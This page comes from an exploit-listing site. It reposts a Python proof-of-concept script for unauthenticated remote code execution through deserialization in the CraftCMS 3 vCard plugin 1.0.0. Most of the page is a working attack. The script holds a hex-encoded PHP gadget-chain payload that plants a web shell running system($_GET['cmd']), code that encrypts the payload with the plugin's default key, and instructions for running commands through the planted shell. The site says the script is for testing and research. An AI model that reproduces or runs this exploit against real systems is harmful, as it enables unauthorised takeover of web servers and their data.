Advertisement






Craft CMS 3 vCard 1.0.0 Remote Code Execution

CVE Category Price Severity
CWE-77 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2020-05-23
CPE
cpe:cpe:/a:craftcms:craft_cms:3.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020050184

Below is a copy:

Craft CMS 3 vCard 1.0.0 Remote Code Execution
# Exploit Title: CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution
# Date: 2020-05-18
# Exploit Author: Wade Guest
# Vendor Homepage: https://craftcms.com/
# Software Link: https://plugins.craftcms.com/vcard
# Vulnerability Details: https://gitlab.com/wguest/craftcms-vcard-exploit
# Version: 1.0.0
# Tested on: Ubuntu 19.10 / PHP 7.3.11
# Description: CraftCMS 3 vCard Plugin 1.0.0 - Deserialization to RCE

#!/usr/bin/env python3

import sys
import argparse
import subprocess
import requests

DEFAULT_PAYLOAD = "613a323a7b693a373b4f3a33313a2247757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a6172223a343a7b733a34313a220047757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a61720066696c656e616d65223b733a%s3a222e2f%s223b733a35323a220047757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a61720073746f726553657373696f6e436f6f6b696573223b623a313b733a33363a220047757a7a6c65487474705c436f6f6b69655c436f6f6b69654a617200636f6f6b696573223b613a313a7b693a303b4f3a32373a2247757a7a6c65487474705c436f6f6b69655c536574436f6f6b6965223a313a7b733a33333a220047757a7a6c65487474705c436f6f6b69655c536574436f6f6b69650064617461223b613a333a7b733a373a2245787069726573223b693a313b733a373a2244697363617264223b623a303b733a353a2256616c7565223b733a36373a223c7072653e3c3f70687020696628697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b202020207d203f3e0a223b7d7d7d733a33393a220047757a7a6c65487474705c436f6f6b69655c436f6f6b69654a6172007374726963744d6f6465223b4e3b7d693a373b693a373b7d"

def generatePayload(fname):
fname_hex = str(fname).encode('utf-8').hex()
fname_len_hex = str(len(fname)+2).encode('utf-8').hex()
payload = DEFAULT_PAYLOAD % (fname_len_hex,fname_hex)
return payload


def exploitCard(url,payload):
malicious_url = url + payload.decode()
r = requests.get(malicious_url,verify=False)

return r.status_code

def encryptPayload(payload,salt):
phpcomm = """$string=hex2bin("%s");$key = "%s";$key = md5( $key );$iv = substr( md5( $key ), 0, 16);echo rtrim(strtr(base64_encode(openssl_encrypt( $string, "aes128", md5( $key ), true, $iv )),"+/", "-_"), "=");""" % (payload,salt)
result = subprocess.run(['php','-r',phpcomm],stdout=subprocess.PIPE)
return result.stdout


def main():
parser = argparse.ArgumentParser(description="Unauthenticated RCE for CraftCMS vCard Plugin")
parser.add_argument('-u',dest='url',required=True,help="The URL for the vCard download without the vCard value\nExample: http://craftcms/index.php?p=actions/vcard/default/index&vcard=")
parser.add_argument('-s',dest='salt',default="s34s4L7",help="Security key required for encrypting payload. Defaul is 's34s4L7'")
parser.add_argument('-f',dest='fname',default="shell.php",help="File path/name to use as value in upload path: ./<value> . Use a PHP extension. Default value is 'shell.php'")

if len(sys.argv)<3:
parser.print_help()
sys.exit(0)

args = parser.parse_args()

attPayload = generatePayload(args.fname)

serPayload = encryptPayload(attPayload,args.salt)
if exploitCard(args.url,serPayload) == 500:
            print("Deserialization has been triggered, navigate to craftCMS webroot/"+ args.fname +"\nUse GET parameter 'cmd' to execute commands\nExample: https://craftcms/"+ args.fname +"?cmd=ls%20-al;whoami;ip%20a\n")


if __name__ == '__main__':
main()
sys.exit(0)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum